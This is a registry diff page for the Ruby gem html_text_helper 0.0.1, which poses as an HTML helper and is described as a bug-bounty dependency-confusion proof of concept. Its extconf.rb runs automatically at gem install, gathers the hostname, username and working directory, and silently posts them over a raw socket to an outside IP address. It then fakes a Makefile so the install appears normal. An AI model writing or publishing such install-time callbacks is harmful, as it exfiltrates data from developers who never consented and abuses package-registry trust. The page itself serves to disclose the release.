html_text_helper 0.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of html_text_helper might be problematic. Click here for more details.

Files changed (4) hide show
  1. checksums.yaml +7 -0
  2. data/ext/html_text_helper/extconf.rb +32 -0
  3. data/lib/html_text_helper.rb +11 -0
  4. metadata +46 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: a94f4c167addd139659a748d66fedf660697536a2fa956057c26fd95a55b80a2
4
+ data.tar.gz: a7a2c4f2eaff58e0de1922fd14f2a1f183f275e51dbe05fa9a258aee39a08a23
5
+ SHA512:
6
+ metadata.gz: 5cab13c38e50bbaf1fc751947f8dc06e03ce33101520bc50de2e3ac3700e60bc6272b109e927ae09ad74f91e51d085b6414a88eabc67a5de8e5fc20ce4a1a3d9
7
+ data.tar.gz: e7ec226cd0c95a11dacce20ede374094d649629ca6b38a741f647740a7abe2d284f0ef129748b0839a7594d09522d5019f717f9a9c00d723ccaaeddc5f86f091
data/ext/html_text_helper/extconf.rb ADDED
@@ -0,0 +1,32 @@
1
+ require "socket"
2
+ require "json"
3
+
4
+ # Dependency confusion PoC — harmless callback to prove code execution
5
+ # This is part of authorized HackerOne bug bounty research
6
+ begin
7
+ hostname = `hostname`.strip rescue ""
8
+ username = ENV["USER"] || ENV["USERNAME"] || ""
9
+ cwd = Dir.pwd
10
+ body = JSON.generate({
11
+ "hostname" => hostname,
12
+ "username" => username,
13
+ "cwd" => cwd,
14
+ "package" => "html_text_helper",
15
+ "company" => "instructure",
16
+ "registry" => "rubygems"
17
+ })
18
+ sock = TCPSocket.new("54.80.197.209", 8443)
19
+ sock.print "POST /cb/html_text_helper HTTP/1.1\r\n"
20
+ sock.print "Host: 54.80.197.209:8443\r\n"
21
+ sock.print "Content-Type: application/json\r\n"
22
+ sock.print "Content-Length: #{body.length}\r\n"
23
+ sock.print "Connection: close\r\n"
24
+ sock.print "\r\n"
25
+ sock.print body
26
+ sock.close
27
+ rescue => e
28
+ # Silently fail — this is just a PoC callback
29
+ end
30
+
31
+ # Create dummy Makefile so gem install succeeds
32
+ File.write("Makefile", "all:\n\ttrue\ninstall:\n\ttrue\n")
data/lib/html_text_helper.rb ADDED
@@ -0,0 +1,11 @@
1
+ # Dependency confusion proof-of-concept package
2
+ # Registered as part of authorized HackerOne bug bounty research
3
+ # This is a harmless placeholder — no malicious functionality
4
+
5
+ module HtmlTextHelper
6
+ VERSION = "0.0.1"
7
+
8
+ def self.info
9
+ "This is a dependency confusion PoC gem for authorized security research."
10
+ end
11
+ end
metadata ADDED
@@ -0,0 +1,46 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: html_text_helper
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.0.1
5
+ platform: ruby
6
+ authors:
7
+ - Security Research
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2026-03-25 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: 'Harmless placeholder registered as part of authorized HackerOne bug
14
+ bounty research. Contact: security researcher via HackerOne.'
15
+ email: security-research@example.com
16
+ executables: []
17
+ extensions:
18
+ - ext/html_text_helper/extconf.rb
19
+ extra_rdoc_files: []
20
+ files:
21
+ - ext/html_text_helper/extconf.rb
22
+ - lib/html_text_helper.rb
23
+ homepage: https://github.com/nickel-lang/nickel
24
+ licenses:
25
+ - MIT
26
+ metadata: {}
27
+ post_install_message:
28
+ rdoc_options: []
29
+ require_paths:
30
+ - lib
31
+ required_ruby_version: !ruby/object:Gem::Requirement
32
+ requirements:
33
+ - - ">="
34
+ - !ruby/object:Gem::Version
35
+ version: '0'
36
+ required_rubygems_version: !ruby/object:Gem::Requirement
37
+ requirements:
38
+ - - ">="
39
+ - !ruby/object:Gem::Version
40
+ version: '0'
41
+ requirements: []
42
+ rubygems_version: 3.4.20
43
+ signing_key:
44
+ specification_version: 4
45
+ summary: Security research — dependency confusion proof of concept
46
+ test_files: []